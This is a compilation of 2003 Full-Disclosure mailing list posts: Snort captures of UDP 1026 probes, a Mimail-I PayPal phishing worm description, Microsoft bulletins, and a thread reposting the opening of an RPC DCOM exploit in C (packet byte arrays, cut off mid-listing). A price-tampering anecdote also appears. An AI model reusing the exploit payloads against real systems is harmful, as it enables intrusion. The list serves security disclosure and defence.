[Full-Disclosure] Increase probe on UDP port 1026
During the last a few hours, I've seen a huge jump in traffic to UDP
port 1026 (Windows Messaging).
I know that the exploit for MS03-043 has been released since around 2
weeks ago, but that exploit as far as I know only works by using UDP
port 135.
One interesting pattern that I found out from the packet that Snort
captured are:
1. One attacker host only send one packet to target host.
2. The attackers come from all over the world (which indicates a rapid
infection)
3. The packet always contains (00 00 00 00 00) for the message part.
Below is the Snort rule that I put in my IDS box
alert udp !$USU_NET any - any 1026 (msg:MS03-043 PROBE??;
classtype:bad-unknown;)
And these are some of the packet that Snort capture:
[**] MS03-043 PROBE?? [**]
12/01-15:45:08.986417 0:D0:4:F2:4C:A - 0:B0:D0:29:D5:40 type:0x800
len:0x3C
200.176.192.151:1042 - 129.123.x.x:1026 UDP TTL:111 TOS:0x0 ID:33601
IpLen:20 DgmLen:30
Len: 2
0x: 00 B0 D0 29 D5 40 00 D0 04 F2 4C 0A 08 00 45 00
...)[EMAIL PROTECTED]
0x0010: 00 1E 83 41 00 00 6F 11 AA 4C C8 B0 C0 97 81 7B
...A..o..L.{
0x0020: 13 7E 04 12 04 02 00 0A D9 84 00 00 00 00 00 00
.~..
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] MS03-043 PROBE?? [**]
12/01-14:01:19.788400 0:D0:4:F2:4C:A - 0:2:B3:C9:36:64 type:0x800
len:0x3C
81.74.106.18:26246 - 129.123.x.x:1026 UDP TTL:106 TOS:0x0 ID:7877
IpLen:20 DgmLen:30
Len: 2
0x: 00 02 B3 C9 36 64 00 D0 04 F2 4C 0A 08 00 45 00
6dL...E.
0x0010: 00 1E 1E C5 00 00 6A 11 C8 EA 51 4A 6A 12 81 7B
..j...QJj..{
0x0020: 2C 48 66 86 04 02 00 0A 2C 32 00 00 00 00 00 00
,Hf.,2..
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] MS03-043 PROBE?? [**]
12/01-09:28:06.146677 0:D0:4:F2:4C:A - 0:2:B3:E7:49:84 type:0x800
len:0x3C
62.243.125.82:1194 - 129.123.x.x:1026 UDP TTL:114 TOS:0x0 ID:6633
IpLen:20 DgmLen:30
Len: 2
0x: 00 02 B3 E7 49 84 00 D0 04 F2 4C 0A 08 00 45 00
I.L...E.
0x0010: 00 1E 19 E9 00 00 72 11 DD 95 3E F3 7D 52 81 7B
..r}R.{
0x0020: 13 90 04 AA 04 02 00 0A A5 DD 00 00 00 00 00 00
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] MS03-043 PROBE?? [**]
12/01-15:47:16.721798 0:D0:4:F2:4C:A - 0:8:A1:21:91:D8 type:0x800
len:0x3C
140.228.112.8:1478 - 129.123.x.x:1026 UDP TTL:118 TOS:0x0 ID:43359
IpLen:20 DgmLen:30
Len: 2
0x: 00 08 A1 21 91 D8 00 D0 04 F2 4C 0A 08 00 45 00
...!..L...E.
0x0010: 00 1E A9 5F 00 00 76 11 09 69 8C E4 70 08 81 7B
..._..v..i..p..{
0x0020: 13 9F 05 C6 04 02 00 0A 64 0B 00 00 00 00 00 00
d...
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] MS03-043 PROBE?? [**]
12/01-13:46:34.522088 0:D0:4:F2:4C:A - 0:8:A1:B:6F:6A type:0x800
len:0x3C
24.157.247.137:1076 - 129.123.x.x:1026 UDP TTL:109 TOS:0x0 ID:30415
IpLen:20 DgmLen:30
Len: 2
0x: 00 08 A1 0B 6F 6A 00 D0 04 F2 4C 0A 08 00 45 00
ojL...E.
0x0010: 00 1E 76 CF 00 00 6D 11 31 80 18 9D F7 89 81 7B
..v...m.1..{
0x0020: 13 DE 04 34 04 02 00 0A 52 24 00 00 00 00 00 00
...4R$..
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Any idea?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] HP All-in-one printers on Dells
On Thu, Nov 20, 2003 at 08:44:02AM -0700, Jim Duggan wrote: I have a few customers using various dell PCs, and it seems upon booting up with a HP all-in-one printer attached to the USB port the PC attempt to boot off the printer, causing boot times to exceed 20 minutes. Obviously its timing out after said time but im wondering what the hell makes the dell bios think it can boot off the printer, my only assumption would be the smart card reader. Wondering if anyone else has experienced something like this and if so could give a little more insite. I dont see anything short of a bios upgrade from dell fixing this, as of now i just have the customer unplugging the printer upon reboots as a temp workaround. I think at that time I resolved it by turning off support for legacy USB applications on the BIOS, or something like that. Just go to the BIOS, and check the settings for the USB. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Fwd: YOUR PAYPAL.COM ACCOUNT EXPIRES
On Fri, Nov 14, 2003 at 12:52:24AM -0200, Rodrigo Barbosa wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thu, Nov 13, 2003 at 04:43:16PM -0800, Larry Hand wrote: Anyone else seeing this? It comes with an attachment Paypal.asp.scr. Anyone know what it is? It sure looks suspicious. I beg your pardon, but ... suspicious ?!?! :) Actually the answer just came right now: http://www.sophos.com/virusinfo/analyses/w32mimaili.html W32/Mimail-I is a worm which spreads via email using addresses harvested from the hard drive of your computer. All email addresses found on your PC are saved in a file named el388.tmp in the Windows folder. In order to run itself automatically when Windows starts up the worm copies itself to the file svchost32.exe in the Windows folder and adds the following registry entry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SvcHost32 The emails sent by the worm have the following characteristics: Subject line: YOUR PAYPAL.COM ACCOUNT EXPIRES Message text: Dear PayPal member, PayPal would like to inform you about some important information regarding your PayPal account. This account, which is associated with the email address [EMAIL PROTECTED] will be expiring within five business days. We apologize for any inconvenience that this may cause, but this is occurring because all of our customers are required to update their account settings with their personal information. We are taking these actions because we are implementing a new security policy on our website to insure everyone's absolute privacy. To avoid any interruption in PayPal services then you will need to run the application that we have sent with this email (see attachment) and follow the instructions. Please do not send your personal information through email, as it will not be as secure. IMPORTANT! If you do not update your information with our secure application within the next five business days then we will be forced to deactivate your account and you will not be able to use your PayPal account any longer. It is strongly recommended that you take a few minutes out of your busy day and complete this now. DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This mail is sent by an automated message system and the reply will not be received. Thank you for using PayPal. Attached file: www.paypal.com.scr If you run the worm, a dialog box pops up requesting you to enter a range of information about your credit card. This includes your full credit card number, your PIN, the expiry date, and even the so-called CVV code (this is an additional three-digit security code printed on the back of your card which is not recorded by credit card machines during transactions). The dialog includes a PayPal logo in a further attempt to appear legitimate. Information entered into the form is sent out by email. Note: do not act on web links or attachments sent to you in emails which claim to come from banks or financial companies. The apparent source of an email is too easily forged. -- Forwarded Message -- Subject: YOUR PAYPAL.COM ACCOUNT EXPIRES Date: Fri, 14 Nov 2003 03:29:00 -0500 From: PayPal.com [EMAIL PROTECTED] To: [EMAIL PROTECTED] - -- Rodrigo Barbosa [EMAIL PROTECTED] Quid quid Latine dictum sit, altum viditur Be excellent to each other ... - Bill Ted (Wyld Stallyns) -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE/tENnpdyWzQ5b5ckRAsuCAJ9m25kwTnpwR7oV9jaeSKmVg0v8MACgkmbV TThDx7KiEGijiGOhBnr5BwU= =ro3i -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Fwd: YOUR PAYPAL.COM ACCOUNT EXPIRES
On Thu, Nov 13, 2003 at 07:44:27PM -0600, Rachael Treu wrote: Delete it or forward it to [EMAIL PROTECTED] Headers (at least on the copy I received) identify the man behind the curtain as... From [EMAIL PROTECTED] Thu Nov 13 17:28:51 2003 Return-Path: [EMAIL PROTECTED] Received: from 81.249.20.142 (APuteaux-111-1-5-142.w81-249.abo.wanadoo.fr +[81.249.20.142]) I don't think yahoo.com has something to do here, since the culprit is one user from wanadoo.fr He just spoofed some email @yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
For us that can not interpret the site, what more information can be
provided.
I believe if you use babelfish.altavista.com, you'll come to:
http://forum.securitylab.ru/forum_posts.asp?TID=5642PN=0TPN=3
The code itself is:
#include stdio.h
#include winsock2.h
#include windows.h
#include process.h
#include string.h
#include winbase.h
FILE *fp1;
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
Re: [Full-Disclosure] Internet Explorer (BAN IT !!!)
On Thu, Oct 09, 2003 at 07:54:08AM +1000, gregh wrote: - Original Message - From: Stephen [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Thursday, October 09, 2003 5:19 AM Subject: [Full-Disclosure] Internet Explorer (BAN IT !!!) It becomes really dangerous to use IE ... http://www.k-otik.com/WMPLAYER-TEST/ God bless Mozilla http://www.mozilla.org/ Your test didn't work on my IESP1 under XP with all patches excepting 811394. Absolutely no effect on WMP. My original WMP remains and works. It depends whether you were logging as a privileged user or not. If not, then your browser can't delete the wmplayer.exe file, because the only user that can change/delete the wmplayer.exe file is privileged user. C:\PROGRA~1\Windows Media Playercacls wmplayer.exe C:\PROGRA~1\Windows Media Player\wmplayer.exe BUILTIN\Users:R BUILTIN\Power Users:C BUILTIN\Administrators:F NT AUTHORITY\SYSTEM:F C:\PROGRA~1\Windows Media Player The problem is just too many people are running their Windows with Full Privileges. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Red Hat Certification for... (however much you want to pay)
On Wed, Oct 01, 2003 at 09:18:51PM -0400, Justin Shin wrote: If I had my druthers at redhat, someone aint gonna have a job come thursday mornin What's more, I played around and came to amusement with the fact that I had just made the security course cost me 0.99 . Talk about cheap! Why, Redhat should invest in training their coders, and avoid being duped by the oldest technique in webapp history... Even more funny, I set it to be -$8098082308 and redhat now owes me that much ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Microsoft Security Bulletin MS03-039
On Wed, Sep 10, 2003 at 12:54:54PM -0400, Noel, Marcus wrote: http://www.microsoft.com/technet/security/bulletin/MS03-039.asp As I would expect before, the RPC stuff will never be secured that fast. Even on UNIX it took them years to make it secure. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Flaw in Visual Basic for Applications Could Allow Arbitrary Code Execution (822715)
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-037.asp Microsoft Security Bulletin MS03-037 Print Flaw in Visual Basic for Applications Could Allow Arbitrary Code Execution (822715) Originally posted: September 03, 2003 Summary Who should read this bulletin: Customers using Microsoft ® Office applications or applications that use Microsoft Visual Basic® for Applications. Impact of vulnerability: Allow attacker to execute arbitrary code. Maximum Severity Rating: Critical Recommendation: Customers using Microsoft ® Office applications or Microsoft Visual Basic for Applications should apply the patch at the earliest available opportunity. End User Bulletin: An end user version of this bulletin is available at: http://www.microsoft.com/security/security_bulletins/ms03-037.asp. Affected Software: Microsoft Visual Basic for Applications SDK 5.0 Microsoft Visual Basic for Applications SDK 6.0 Microsoft Visual Basic for Applications SDK 6.2 Microsoft Visual Basic for Applications SDK 6.3 Products which Include the Affected Software: Microsoft Access 97 Microsoft Access 2000 Microsoft Access 2002 Microsoft Excel 97 Microsoft Excel 2000 Microsoft Excel 2002 Microsoft PowerPoint 97 Microsoft PowerPoint 2000 Microsoft PowerPoint 2002 Microsoft Project 2000 Microsoft Project 2002 Microsoft Publisher 2002 Microsoft Visio 2000 Microsoft Visio 2002 Microsoft Word 97 Microsoft Word 98(J) Microsoft Word 2000 Microsoft Word 2002 Microsoft Works Suite 2001 Microsoft Works Suite 2002 Microsoft Works Suite 2003 Microsoft Business Solutions Great Plains 7.5 Microsoft Business Solutions Dynamics 6.0 Microsoft Business Solutions Dynamics 7.0 Microsoft Business Solutions eEnterprise 6.0 Microsoft Business Solutions eEnterprise 7.0 Microsoft Business Solutions Solomon 4.5 Microsoft Business Solutions Solomon 5.0 Microsoft Business Solutions Solomon 5.5 Technical details Technical description: Microsoft VBA is a development technology for developing client desktop packaged applications and integrating them with existing data and systems. Microsoft VBA is based on the Microsoft Visual Basic development system. Microsoft Office products include VBA and make use of VBA to perform certain functions. VBA can also be used to build customized applications based around an existing host application. A flaw exists in the way VBA checks document properties passed to it when a document is opened by the host application. A buffer overrun exists which if exploited successfully could allow an attacker to execute code of their choice in the context of the logged on user. In order for an attack to be successful, a user would have to open a specially crafted document sent to them by an attacker. This document could be any type of document that supports VBA, such as a Word document, Excel spreadsheet, PowerPoint presentation. In the case where Microsoft Word is being used as the HTML e-mail editor for Microsoft Outlook, this document could be an e-mail, however the user would need to reply to, or forward the mail message in order for the vulnerability to be exploited. Mitigating factors: The user must open a document sent to them by an attacker in order for this vulnerability to be exploited. When Microsoft Word is being used as the HTML e-mail editor in Outlook, a user would need to reply to or forward a malicious e-mail document sent to them in order for this vulnerability to be exploited. An attacker.s code could only run with the same rights as the logged on user. The specific privileges the attacker could gain through this vulnerability would therefore depend on the privileges granted to the user. Any limitations on a user's account, such as those applied through Group Policies, would also limit the actions of any arbitrary code executed by this vulnerability. Severity Rating: Microsoft Visual Basic for Applications SDK 5.0 Critical Microsoft Visual Basic for Applications SDK 6.0 Critical Microsoft Visual Basic for Applications SDK 6.2 Critical Microsoft Visual Basic for Applications SDK 6.3 Critical The above assessment is based on the types of systems affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them. Vulnerability identifier: CAN-2003-0347 Tested Versions: Microsoft tested Microsoft Visual Basic for Applications SDK 5.0, Microsoft Visual Basic for Applications SDK 6.0, Microsoft Visual Basic for Applications SDK 6.2 and Microsoft Visual Basic for Applications SDK 6.3 assess whether they are affected by this vulnerability. In addition, Microsoft investigated all supported versions of the software listed in the Products which Includes the Affected Software section to determine whether they included the vulnerable software. Previous versions are no longer supported, and may or may not be affected by these vulnerabilities. Frequently
[Full-Disclosure] Flaw in Microsoft Word Could Enable Macros toRun Automatically (827653)
Just Released today http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-035.asp Microsoft Security Bulletin MS03-035 Print Flaw in Microsoft Word Could Enable Macros to Run Automatically (827653) Originally posted: September 03, 2003 Summary Who should read this bulletin: Customers who are using Microsoft® Word Impact of vulnerability: Run macros without warning Maximum Severity Rating: Important Recommendation: Customers who are using affected versions of Microsoft Word should apply the security patch immediately. End User Bulletin: An end user version of this bulletin is available at: http://www.microsoft.com/security/security_bulletins/ms03-035.asp. Affected Software: Microsoft Word 97 Microsoft Word 98 (J) Microsoft Word 2000 Microsoft Word 2002 Microsoft Works Suite 2001 Microsoft Works Suite 2002 Microsoft Works Suite 2003 Technical details Technical description: A macro is a series of commands and instructions that can be grouped together as a single command to accomplish a task automatically. Microsoft Word supports the use of macros to allow the automation of commonly performed tasks. Since macros are executable code it is possible to misuse them, so Microsoft Word has a security model designed to validate whether a macro should be allowed to execute depending on the level of macro security the user has chosen. A vulnerability exists because it is possible for an attacker to craft a malicious document that will bypass the macro security model. If the document was opened, this flaw could allow a malicious macro embedded in the document to be executed automatically, regardless of the level at which macro security is set. The malicious macro could take the same actions that the user had permissions to carry out, such as adding, changing or deleting data or files, communicating with a web site or formatting the hard drive. The vulnerability could only be exploited by an attacker who persuaded a user to open a malicious document .there is no way for an attacker to force a malicious document to be opened. Mitigating factors: The user must open the malicious document for an attacker to be successful. An attacker cannot force the document to be opened automatically. The vulnerability cannot be exploited automatically through e-mail. A user must open an attachment sent in e-mail for an e-mail borne attack to be successful. By default, Outlook 2002 block programmatic access to the Address Book. In addition, Outlook 98 and 2000 block programmatic access to the Outlook Address Book if the Outlook Email Security Update has been installed. Customers who use any of these products would not be at risk of propagating an e-mail borne attack that attempted to exploit this vulnerability. The vulnerability only affects Microsoft Word . other members of the Office product family are not affected. Severity Rating: Microsoft Word (all versions) Important Microsoft Works Suite (all versions) Important The above assessment is based on the types of systems affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them. Vulnerability identifier: CAN-2003-0664 Tested Versions: Microsoft tested Microsoft Word 2002, Microsoft Word 2000, Microsoft Word 98(J), Microsoft Word 97, Microsoft Word X for Macintosh, Microsoft Word 2001 for Macintosh, Microsoft Word 98 for Macintosh, Microsoft Works Suite 2003, Microsoft Works Suite 2002 and Microsoft Works Suite 2001 to assess whether they are affected by this vulnerability. Previous versions are no longer supported and may or may not be affected by this vulnerability. Frequently asked questions What.s the scope of the vulnerability? This vulnerability could enable an attacker to create a document that, when opened in Microsoft Word, could allow an unsigned macro to run regardless of the macro security level. Macros can take any action that the user can take, and as a result this vulnerability could allow an attacker to take actions such as changing data, communicating with Web sites, reformatting the hard disk, or changing the Word security settings. The vulnerability only affects Word.other members of the Office product family are not affected. What causes the vulnerability? The vulnerability results because Word incorrectly checks properties in a modified document, causing it to not prompt the user with a macro security warning when macros are present in the document. What.s a macro? Generally, the term macro refers to a small program that automates frequently-performed tasks in an operating system or in a program. For example, all members of the Office family of products support the use of macros. This allows companies to develop macros that perform as sophisticated productivity tools that run in Word, in Excel, or in other programs. Like any computer program, macros can be misused. Many viruses are
[Full-Disclosure] Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution (827104)
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-038.asp Microsoft Security Bulletin MS03-038 Print Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution (827104) Originally posted: September 3, 2003 Summary Who should read this bulletin: Customers who use Microsoft® Access or who use the downloadable Microsoft Access Snapshot Viewer Impact of vulnerability: Allow an attacker to execute code of their choice Maximum Severity Rating: Moderate Recommendation: Customers who use Microsoft Access or who use the downloadable Microsoft Access Snapshot Viewer should install the security patch at their earliest opportunity. End User Bulletin: An end user version of this bulletin is available at: http://www.microsoft.com/security/security_bulletins/ms03-038.asp. Affected Software: Microsoft Access 97 Microsoft Access 2000 Microsoft Access 2002 Technical details Technical description: With Microsoft Access Snapshot Viewer, you can distribute a snapshot of a Microsoft Access database that allows the snapshot to be viewed without having Access installed. For example, a customer may want to send a supplier an invoice that is generated by using an Access database. With Microsoft Access Snapshot Viewer, the customer can package the database so that the supplier can view it and print it without having Access installed. The Microsoft Access Snapshot Viewer is available with all versions of Access - though it is not installed by default - and is also available as a separate stand-alone download. The Snapshot Viewer is implemented by using an ActiveX control. A vulnerability exists because of a flaw in the way that Snapshot Viewer validates parameters. Because the parameters are not correctly checked, a buffer overrun can occur, which could allow an attacker to execute the code of their choice in the security context of the logged-on user. For an attack to be successful, an attacker would have to persuade a user to visit a malicious Web site that is under the attacker.s control. Mitigating factors: The Microsoft Access Snapshot Viewer is not installed with Microsoft Office by default. An attacker would need to persuade a user to visit a website under the attacker.s control for an attack to be successful. An attacker.s code would run with the same permissions as the user. If a user.s permissions were restricted the attacker would be similarly restricted. Severity Rating: Microsoft Access (all versions) Moderate The above assessment is based on the types of systems affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them. Vulnerability identifier: CAN-2003-0665 Tested Versions: Microsoft tested Access 2002, Access 2000, and Access 97 to assess whether they are affected by this vulnerability. Previous versions are no longer supported and may or may not be affected by this vulnerability. Frequently asked questions What.s the scope of the vulnerability? This is a buffer overrun vulnerability. An attacker who successfully exploited this vulnerability could run programs on another user.s system. Such a program could take any action that the user could take, such as adding, changing, or deleting any data or configuration information. For example, the code could lower the security settings in the browser or write a file to the hard disk. Because the code would run as the user and not as the operating system, any security limitations on the user's account would also be applicable to any code that is run by successfully exploiting this vulnerability. In environments where user accounts are restricted, such as enterprise environments, the actions that an attacker's code could take would be limited by these restrictions. What causes the vulnerability? The vulnerability results because of an unchecked buffer in the ActiveX control that Microsoft Access Snapshot Viewer uses. By invoking a specific function in a particular manner, an attacker could overflow the buffer and gain the ability to run code in the user.s security context. What is the Microsoft Access Snapshot Viewer? The Microsoft Access Snapshot Viewer, you can distribute a snapshot of a Microsoft Access database that allows the snapshot to be viewed without having Access installed. For example, a customer may want to send a supplier an invoice that is generated by using an Access database.the Snapshot viewer would allow the customer to package the database. With Microsoft Access Snapshot Viewer, the supplier can view it and print it without having Access installed. The Microsoft Access Snapshot Viewer is available with all versions of Microsoft Office - though it is not installed by default - and is also available as a separate stand-alone download. The Snapshot Viewer is implemented by using an ActiveX control. What is an ActiveX control? ActiveX is a technology that allows
[Full-Disclosure] Flaw in NetBIOS Could Lead to Information Disclosure (824105)
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-034.asp Microsoft Security Bulletin MS03-034 Print Flaw in NetBIOS Could Lead to Information Disclosure (824105) Originally posted: September 03, 2003 Summary Who should read this bulletin: Customers using Microsoft® Windows® Impact of vulnerability: Information disclosure Maximum Severity Rating: Low Recommendation: Users should evaluate whether to apply the security patch to affected systems. End User Bulletin: An end user version of this bulletin is available at: http://www.microsoft.com/security/security_bulletins/ms03-034.asp. Affected Software: Microsoft Windows NT 4.0® Server Microsoft Windows NT 4.0, Terminal Server Edition Microsoft Windows 2000 Microsoft Windows XP Microsoft Windows Server. 2003 Not Affected Software: Microsoft Windows Millennium Edition An End User version of the bulletin is available at: http://www.microsoft.com/security/security_bulletins/ms03-034.asp. Technical details Technical description: Network basic input/output system (NetBIOS) is an application programming interface (API) that can be used by programs on a local area network (LAN). NetBIOS provides programs with a uniform set of commands for requesting the lower-level services required to manage names, conduct sessions, and send datagrams between nodes on a network. This vulnerability involves one of the NetBT 